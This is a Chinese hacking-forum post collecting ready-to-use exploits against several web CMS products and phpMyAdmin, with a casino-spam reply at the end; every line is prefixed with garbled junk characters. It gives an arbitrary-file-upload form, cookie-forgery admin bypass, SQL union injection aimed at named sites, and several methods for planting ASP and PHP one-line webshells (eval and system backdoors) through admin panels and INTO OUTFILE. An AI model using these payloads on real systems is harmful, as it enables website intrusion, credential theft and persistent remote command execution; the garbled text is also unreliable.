$ E( H, r6 V3 ^9 B  k% s5 zYxShop易想购物商城4.7.1版本任意文件上传漏洞
* Z9 o8 F* @$ t& t8 M1 O0 G" G6 f  ?: D1 d
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
1 V1 ?, R% y$ C8 m" E跳转到网站根目录上传任意文件。
9 l/ f6 C- [: q2 f1 m% y如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
# \0 [( P. r3 i) e4 ?" N5 S1 H<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
8 Z5 K6 S' O) hUpload a new file:<br>
: w; t5 Y; s0 `" z9 h3 K& t<input type="file" name="NewFile" size="50"><br>
+ r  I" ?" ^. d1 r! A, d<input id="btnUpload" type="submit" value="Upload">; I: C8 e  {& G: d& O
</form>
% M3 P* p. R# G/ P0 z; J# \-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: h! V& r- H& y
% l$ C( h0 z2 M& T( J/ i9 `# d. @  [
SDcms 后台拿webshell
' w4 A1 e7 L# T: H- d! L8 |5 m
6 G- M" r0 |5 \9 {, \0 j# J第一种方法:
- r" G# q$ G) C4 M& q进入后台-->系统管理-->系统设置-->系统设置->网站名称;, m2 G/ a) n; Z/ |7 a+ G+ S
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx, u5 B6 t: D- d
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。+ k( I/ X6 X6 N2 b2 t
第二种方法:
8 |  o& c1 R7 U" H进入后台-->系统管理-->系统设置-->系统设置->上传设置;
  t, B6 D) ~$ y% ?# u在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!# R# I/ U0 S& ~7 p
第三种方法:1 f0 h; ]* x5 @: _* T3 v8 `
进入后台-->界面管理-->模板文件管理-->创建文件
# r! h) h$ v2 A3 J# d文件名写入getshell.ashx
- o+ s1 g( p- |5 O+ \& j内容写入下面内容:
. I6 V/ ]9 l# y6 P7 C2 n% _/====================复制下面的=========================/2 x, Y" o2 M0 y0 P. _/ \" w6 h, K
<%@ WebHandler Language="C#" Class="Handler" %>
9 W% E8 S% ]) V  ^0 X3 _( Eusing System;
( ?' g% Z% {8 ]- r% {0 c: x9 [) xusing System.Web;
& L' O$ h; @: m& v0 ousing System.IO;5 s' W0 z4 H( u$ [; E# b
public class Handler : IHttpHandler {
/ b- n2 D/ x/ e5 Xpublic void ProcessRequest (HttpContext context) {
4 E6 t! Q- h7 `9 f7 M; b4 |# tcontext.Response.ContentType = "text/plain";
# p% }5 C$ x: S! }2 O  k* LStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
4 C9 w3 y8 ?% R- o' q( {file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");- {, o& _! Q8 ~3 @1 X2 L+ u% g
file1.Flush();
6 D3 S; x; x2 E1 f6 J/ P( \. pfile1.Close();& K8 a$ R+ v' ~1 @
}
+ }  {$ Y% p2 Xpublic bool IsReusable {
% M& z' k4 g+ u$ c0 Gget {
  }1 Y& b& n0 R4 jreturn false;$ B( t  `# i9 i  ]8 Y% o* }
}4 d% H6 Q9 e" Y0 A( [4 E
}
8 j2 s0 e$ N' a" S; T4 v2 V}
# w: W! P- X  v/=============================================/
" b; p* u& V0 J  t# P7 k访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx; ^" n8 a- b5 P# @( \
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
% B( w& _+ y6 x: ]+ V7 H-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ~6 r* m8 T& i+ T$ g5 X
# ~+ q" O; X) ?ESCMS网站管理系统0day; P& @% {& O" o# _, a# s6 @( A- u
! }& p8 d- z  q
后台登陆验证是通过admin/check.asp实现的, N. d/ ]$ |; K6 O; Z8 g

8 ~, Z- e- K+ N- o首先我们打开http://target.com/admin/es_index.html8 O! T7 ]4 G' \
然后在COOKIE结尾加上7 o5 z4 q% ]1 S2 H: b
; ESCMS$_SP2=ES_admin=st0p;
) C6 m. \5 q2 l; D6 W; }1 W修改,然后刷新
6 r1 t, V$ p  R5 ^" W$ h/ V进后台了嘎..) s: F, d  m. ^! \
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL3 Y, N+ O7 V0 t% ~- J; j8 \3 M

. w- O" V5 ~/ [8 q7 h" l" _利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.$ w7 F' H* Z6 E# y1 d
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp# ?# \' Q+ Y& x; w- p
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
8 h! \& }: _% ~. }. C$ d在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
! h* v6 B5 X- F$ j5 S------------------------------------------------------------------------------------------------------------------------------------------------------------------------------, E9 d4 \# j( X* Y' J' H) Q
/ r. h) N3 l" `4 k
宁志网站管理系统后台无验证漏洞及修复+ c1 ~/ V4 }% C, l' E
# H7 p2 v9 _7 G. ~: A
网上搜了一下,好像没有发布.如有雷同纯粹巧合!$ R7 U& O% R/ M; ~* G
官方网站:www.ningzhi.net
9 G' h0 J! h& V$ q7 H8 l: e& ?学校网站管理系统 V.2011版本
4 y+ C8 O% u; t* _/ {# b8 vhttp://down.chinaz.com/soft/29943.htm
# a3 o0 b6 \; v' l  u其它版本(如:政府版等),自行下载.
  u7 D* b, ~0 I; S漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 v6 o( m- }  b# C' Ylogin.asp代码如下:
8 g- G9 D* F; i  Q8 `! a: z<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> + J6 t. V/ d. l: ]& q  i! x$ s) B
manage.asp代码我就不帖出来了.反正也没验证.
- g. |$ A' X: s. r9 j只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
. L2 E! k/ I) p  x4 r! }+ _3 }漏洞利用:" k6 x5 @7 L4 w% z* j; C8 e
直接访问http://www.0855.tv/admin/manage.asp
0 `: a+ I9 f6 o& P数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
$ f7 ]9 |  r9 U- c1 R* U----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ u+ D) y4 w  N# i) V4 z; u* J! m. o
phpmyadmin拿shell的四种方法总结及修复4 l- O! L0 j0 G) D. e2 ]1 ]

( I# j# U8 G" I( S2 ^" |7 e方法一:
' |- Z. C1 H- C/ g. [% ACREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );) b2 D$ `: e0 T. T. A* {
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');3 I8 l. ~, N; G6 e* D1 a  ^
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';7 K+ b+ |, K# {
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php+ n. z8 L& v2 a9 K
    一句话连接密码:7on
- v8 T" O+ x$ x$ i方法二:9 Y6 ]( V) o  c; C
读取文件内容:    select load_file('E:/xamp/www/s.php');* }- o0 c. H% p" x, x
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
' q) T2 F: M  `, }% v+ o& bcmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
* i+ b) p2 b8 z# W5 J方法三:
0 U" m5 U5 U/ {& B0 h1 G( u/ I0 wJhackJ版本 PHPmyadmin拿shell
5 W+ m% Z% f! e6 s7 n+ \1 hCreate TABLE study (cmd text NOT NULL);/ z8 d" e' X' B7 ~$ P+ a
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');* `: \" O9 m# ~0 |  C
select cmd from study into outfile 'E:/wamp/www/7.php';
; K  q# ?3 G# E. |; t- PDrop TABLE IF EXISTS study;
# x5 R: X% {% G<?php eval($_POST[cmd])?>
3 b& T, J8 H( Y0 D# xCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
& Z+ H* Z" r2 P8 TINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
. e3 N- |. [: [1 a# oSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 13 D: ^. H" |" X4 w9 S( A5 q3 K
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
6 |0 O% o% J$ a$ o) m2 u9 T) x方法四:
0 T; w; R! w, z: A/ U* T% Eselect load_file('E:/xamp/www/study.php');6 X* @7 |. t$ X- ]
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'! y& ?& h# O/ h4 z1 Q  J
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir4 w( X9 o" o( Z7 _. [6 Q
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
! Q7 X2 q+ K8 s! d0 E' O3 g7 L
! }' i5 \1 l- R2 K8 E6 b2 iNO.001中学网站管理系统 Build 110628 注入漏洞7 I5 \& z8 N7 [
* }" k  G) z+ |  ~  F
NO.001中学网站管理系统功能模块:4 t+ ^% j  X/ g! u: n
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
% {% p% U! q8 ^4 z' X1 Q2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息; L6 h1 I. {0 \) @! y; V# G( d
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息8 {7 A' d3 y  b+ a( d1 r
4.视频图片管理:一级分类,动态添加视频或者图片等信息
) k6 D! d! J& X" Y5.留言管理:对留言,修改,删除、回复等管理% Q8 s" [# ^- U% q% O$ ?
6.校友频道:包括校友资料excel导出、管理等功能" Y% q: r0 G7 C0 H$ W
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页( ^8 P4 x6 w7 X/ V! I4 W
默认后台:admin/login.asp( `) l* y1 d; z, U
官方演示:http://demo.001cms.net4 N) F- V- T5 W( ^8 X" y9 P9 P
源码下载地址:http://down.chinaz.com/soft/30187.htm& r" Q- H0 l/ W& y
EXP:
; A3 |6 k% R5 B& Runion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
) C' F. B7 C" y; l测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
8 @' a& D5 ^  T4 y8 {getshell:后台有备份,你懂的
: K( x+ ?- [. C3 m/ n另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
* {( y2 ?- h% d* Q' v-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表